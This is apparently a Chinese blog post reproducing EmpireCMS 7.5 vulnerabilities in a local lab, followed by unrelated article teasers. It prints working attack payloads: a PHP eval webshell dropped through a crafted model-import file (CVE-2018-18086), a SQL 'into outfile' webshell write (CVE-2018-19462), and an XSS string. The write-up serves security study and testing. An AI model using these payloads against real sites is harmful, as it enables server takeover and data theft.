帝国CMS(EmpireCMS)漏洞复现

简介

《帝国网站管理系统》英文译为Empire CMS,简称Ecms,它是基于B/S结构,且功能强大而帝国CMS-logo易用的网站管理系统。
帝国CMS官网:http://www.phome.net/
参考相关漏洞分析文章,加上更详细的渗透测试过程。

参考

帝国CMS(EmpireCMS)v7.5漏洞分析
帝国cms v7.5—漏洞分析

靶场搭建

环境:PHP+Mysql+EmpireCMS<=7.5

安装phpstudy_pro

下载地址:https://www.xp.cn/
十分方便,点击下载安装即可。

安装EmpireCMS

下载地址:http://www.phome.net/download/
解压后放在phpstudy_pro/WWW目录下
与常见的靶场安装相似,访问http://127.0.0.1/upload/e/install/index.php填写相关配置信息安装即可
在这里插入图片描述
最后上删除/e/install目录,避免被再次安装.

漏洞复现

身份鉴别类

弱口令

前台可进行密码爆破,弱口令test/test@123
在这里插入图片描述

验证码失效

使用同一验证码尝试进行登录,验证码失效,故可进行上述爆破。
且存在敏感信息明文传输,数据包中用户名密码为url编码。
注册功能处同样存在此漏洞。
在这里插入图片描述
找回密码处,验证码失效,且可以无限发送密码重置邮件。
在这里插入图片描述

CSRF漏洞

修改referer依旧正常返回数据。
在这里插入图片描述

XSS漏洞

系统->备份与恢复数据->执行SQL语句,存在XSS漏洞。
在这里插入图片描述
进入商城系统,修改mainfile字段为“mainfile=javascript:alert(/xss/)”,成果弹窗。
在这里插入图片描述

会话重放漏洞

找回密码功能,可无限发送邮件,且验证码未失效。
在这里插入图片描述
在这里插入图片描述

文件上传漏洞

CVE-2018-18086()
后台,系统->管理数据表-> 导入系统模型,导入一个.php.mod文件,内容如下。
<? php file_put_contents("test.php","<?php @eval(\$_POST['hack']); ?>"); ?>
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

远程代码执行漏洞

CVE-2018-19462
系统->备份与恢复数据->执行SQL语句,用select ... into outfile语句写入php一句话木马。
select '<?php @eval($_POST[123])?>' into outfile 'C:/phpstudy_pro/WWW/EmpireCMS_7.5_SC_UTF8/getshell.php''
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/761067.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

python自动化内存管理

引用 在编程中&#xff0c;引用是指用来标识、访问或操作某个对象的值的标识符或变量。我们可以将引用看作是对象的别名&#xff0c;通过引用可以操作对象&#xff0c;包括读取、修改和传递对象的值。 举例来说&#xff0c;假设我们有一个字符串对象name&#xff0c;我们可以创…

Vue中的axios深度探索:从基础安装到高级功能应用的全面指南

文章目录 前言一、axios 请求1. axios的概念2. axios的安装3. axiso请求方式介绍4. axios请求本地数据5. axios跨域6. axios全局注册7. axios支持的请求类型1&#xff09;get请求2&#xff09;post请求3&#xff09;put请求4&#xff09;patch请求5&#xff09;delete请求 二、…

仓颉编程语言 -- 初识(二)

4、卓越性能 仓颉语言通过值类型、多层级静态分析优化和超轻量运行时&#xff0c;在计算机语言基准测试Benchmarks Game上&#xff0c;相比业界同类语言取得了较为明显的性能优势。 4.1 静态编译优化 仓颉编译采用模块化编译&#xff0c;编译流程间通过IR作为载体&#xff…

BCFtools安装

记得之前安装这个软件的时候是非常简单的&#xff0c;但是今天重新安装的时候出现了很多的麻烦&#xff0c;想想还是做个记录吧! bcftools的下载地址如下&#xff1a; Releases samtools/bcftools (github.com)https://github.com/samtools/bcftools/releases/这里我们选用的…

protobufjs解析proto消息出错RangeError: index out of range: 2499 + 10 > 2499解决办法

使用websocket通讯传输protobuf消息的时候&#xff0c;decode的时候出错了&#xff1a; RangeError: index out of range: 2499 10 > 2499 Error: invalid wire type 4 at offset 1986 出现这种错误的时候&#xff0c;99%是因为proto里面的消息类型和服务端发送的消息类型不…

AI绘画:提升效率的艺术之道

前言 AI绘画&#xff1a;提升效率的艺术之道 在当今数字时代&#xff0c;人工智能&#xff08;AI&#xff09;正以惊人的速度融入我们的生活各个领域。艺术界也不例外。AI绘画作为一种创新的工具和技术&#xff0c;正在改变着艺术家们的创作方式&#xff0c;并为他们带来了从来…

【多媒体】Java实现MP4和MP3音视频播放器【JavaFX】【音视频播放】

在Java中播放音视频可以使用多种方案&#xff0c;最常见的是通过Swing组件JFrame和JLabel来嵌入JMF(Java Media Framework)或Xuggler。不过&#xff0c;JMF已经不再被推荐使用&#xff0c;而Xuggler是基于DirectX的&#xff0c;不适用于跨平台。而且上述方案都需要使用第三方库…

LeetCode刷题之HOT100之二叉树的最近公共祖先

2024 7/1 新的一个月来啦&#xff01;也算是迎来了暑假&#xff0c;可惜我们没有暑假&#xff0c;只能待实验室&#xff0c;中途会有10天小假。Anyway&#xff0c;做题啦 1、题目描述 2、算法分析 又来到了树的部分&#xff0c;要找最近的公共祖先。想到树就会想到DFS和BFS。…

李一桐遭遇蜈蚣惊魂

李一桐遭遇“蜈蚣惊魂”&#xff01;刘宇宁展现真男人本色在娱乐圈的幕后&#xff0c;总有一些心跳加速的惊险。近日&#xff0c;李一桐在拍戏时遭遇了一场“蜈蚣惊魂”&#xff0c;让无数粉丝和网友为她捏了一把冷汗。而在这场惊险的遭遇中&#xff0c;刘宇宁展现出了真男人的…

【Spring Boot】spring boot环境搭建

1、环境准备 JDK安装&#xff1a;确保安装了Java Development Kit (JDK) 1.8或更高版本。JDK是Java编程的基础&#xff0c;Spring Boot项目需要它来编译和运行。Maven或Gradle安装&#xff1a;选择并安装Maven或Gradle作为项目构建工具。Maven通过pom.xml文件来管理项目的依赖…

深入浅出:npm 常用命令详解与实践

在现代的前端开发流程中&#xff0c;npm&#xff08;Node Package Manager&#xff09;已经成为了不可或缺的一部分。它不仅帮助我们有效地管理项目中的依赖包&#xff0c;还提供了一系列强大的命令来优化开发体验。在这篇博客中&#xff0c;我们将深入探讨 npm 的常用命令&…

【正点原子K210连载】 第十五章 按键中断实验 摘自【正点原子】DNK210使用指南-CanMV版指南

1&#xff09;实验平台&#xff1a;正点原子ATK-DNK210开发板 2&#xff09;平台购买地址https://detail.tmall.com/item.htm?id731866264428 3&#xff09;全套实验源码手册视频下载地址&#xff1a; http://www.openedv.com/docs/boards/xiaoxitongban 第十五章 按键中断实…

问题解决|endnote文献手工导入

一、背景介绍 手工导入一篇文献是指手动编辑文献的相关信息Preference。为什么要手动这么麻烦&#xff1f;因为有的文献比较老只有纸质版本&#xff0c;有的文献信息不全&#xff0c;有的则是没有编码无法识别等等&#xff0c;需要手工录入&#xff1b;一般需要手工录入的情况比…

Decorators与类

在Python中&#xff0c;装饰器&#xff08;decorator&#xff09;是一种用于修改函数或方法行为的特殊函数。装饰器可以用于函数、方法和类。在类中使用装饰器可以增强类的方法、属性&#xff0c;甚至整个类的功能。以下是一些关于我对装饰器与类的详细信息和示例教程。 1、问题…

计算机系统导论

第一章 计算机系统基本概述 【1】世界上第一台计算机 1946 年由美国宾夕法尼亚大学研制出世界上第一台电子数字计算机&#xff0c;取名 ENIAC。由此 诞生了“第一个电子的大脑” 【2】计算机的发展阶段 第一个发展阶段&#xff1a;1946-1956 年电子管计算机的时代.1946 年…

Halcon 特征检测使用

一 Region area: 面积row: 中心的行坐标column: 中心的列坐标width: 区域的宽度(平行于坐标轴)height: 区域的高度(平行于坐标轴)row1: 左上角的行坐标column1: 左上角的列坐标row2: 右下角的行坐标column2: 右下角的列坐标‘ra’; 椭圆的长半轴…

IMU用于水下机械臂遥操作

在当今科技飞速发展的时代&#xff0c;探索深海奥秘与执行水下任务如今有了新帮手——一款能模拟人类手臂动作的水下机械臂。这款由波兰科学家携手机器人公司联手打造的创新产品能够精确复现人类手臂的动作&#xff0c;其精髓在于构建了一个由惯性测量单元&#xff08;IMU&…

【技巧】ArcGIS Pro设置自动保存数据编辑内容

一、工程文件自动保存 ArcGIS Pro软件的工程也可以自动保存备份。默认备份时间是5分钟&#xff0c;您可以在【工程】→【选项】→【常规】→【工程恢复】中调整自动备份时间。 二、数据编辑自动保存 操作方法&#xff1a;【工程】→【选项】→【编辑】→【会话】&#xff0c;勾…

fastapi+vue3前后端分离开发第一个案例整理

开发思路 1、使用fastapi开发第一个后端接口 2、使用fastapi解决cors跨域的问题。cors跨域是浏览器的问题&#xff0c;只要使用浏览器&#xff0c;不同IP或者不同端口之间通信&#xff0c;就会存在这个问题。前后端分离是两个服务&#xff0c;端口不一样&#xff0c;所以必须要…

flex讲解

随着前端技术的不断发展和更新&#xff0c;flex布局成为前端布局的主流。但是仍然有很多前端新手搞不懂flex到底怎么用&#xff01;&#xff01;&#xff01;今天我们就来好好讲讲flex布局 老规矩先上定义 什么是flex布局 布局的传统解决方案&#xff0c;基于盒状模型&#x…